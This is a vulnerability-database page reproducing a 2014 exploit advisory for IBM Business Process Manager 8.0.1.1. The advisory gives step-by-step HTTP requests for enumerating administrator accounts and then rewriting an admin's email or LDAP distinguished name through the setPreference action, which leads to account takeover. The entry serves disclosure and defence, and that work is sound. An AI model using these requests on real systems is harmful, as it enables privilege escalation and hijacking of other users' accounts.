Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

IBM Business Process Manager - User Account Reconfiguration

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 12 Views

IBM Business Process Manager user account reconfiguration vulnerabilit

Code

                                                Exploit Title: IBM BMPS (BPM) User account reconfiguration/Privilege Escalation/Information Disclosure
Date: 31.01.14
Exploit Author: 0in
Software link: http://www-03.ibm.com/software/products/en/business-process-manager-family/
Version: 8.0.1.1 (newest versions can also be vulnerable)

Vulnerability Description:
Its possible to change some specfic values in accounts database (in my case it was LDAP) by authenticated but not privileged user, invoking setPreference action

------------------------------------------------------------------------------------
First of all, we should enumerate existing users to find administrator account.
We should proceed following request:

GET /rest/bpm/wle/v1/users?filter=*admin*&maxresult=11&assignTaskidFilter=[INT TASK ID]&namesonly=false&parts=all HTTP/1.1
x-requested-with: XMLHttpRequest

In result of this request we can get response like this:
{"status":"200","data":{"users":[{"userID":1,"userName":"admin","fullName":"Administrator BPMS","isDisabled":false,"primaryGroup":null,"emailAddress":"admin@corpo","userPreferences":{ "Portal Default Page":"/dashboards?dashboard=%2Fteamworks%2FexecuteServiceByName%3FprocessApp%3DSCIM%26serviceName%History%2Bprocess%25C3%25B3w%26snapshot%3D4.0.0%26zResumable%3Dtrue", "Task Email Address":"admin@corpo","Task Notification":"true","LDAPDistinguishedName":"CN=bpmsadmin,OU=confidential,OU=Users,OU=RU,DC= confidential,DC= confidential,DC=corp,DC= confidential ","Locale":"ru","Alert On Assign And Run":"true"},"tasksCollaboration":null,"memberships":["Debug","admins","authors","portal_admins","process_owners","allusers","All Users_S_da7e4d23-78cb-4483-*******",[?]

Ok, so now we have administrator username, in next step we should set his email or LDAPDistinguishedName to our, to invoke this, we should generate url like this:

PUT /rest/bpm/wle/v1/user/admin?action=setPreference&key=Task%20Email%20Address&value=AttackerEmail@corpo HTTP/1.1
x-requested-with: XMLHttpRequest

Or just set LDAP preferences to our:
PUT /rest/bpm/wle/v1/user/admin?action=setPreference&key=LDAPDistinguishedName&value= CN=ATTACKER_LOGIN,OU=w00tw00t,OU=Users,OU=Group,DC=my,DC=sub,DC=domain,DC=corpo HTTP/1.1


Now attacker can receive all notifications about victim processes in his email, attacker can change victim password using ?forgotten password? option, change victim portal default page, LDAP Attributes. We have lot of other possibilities to exploit this situation it depends of BPMS service context.

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
ibm business process manageruser account reconfigurationprivilege escalationinformation disclosurevulnerabilityset preference actionuser enumerationadmin username discoveryemail address manipulationldap distinguished name manipulationsecurity exploit.
12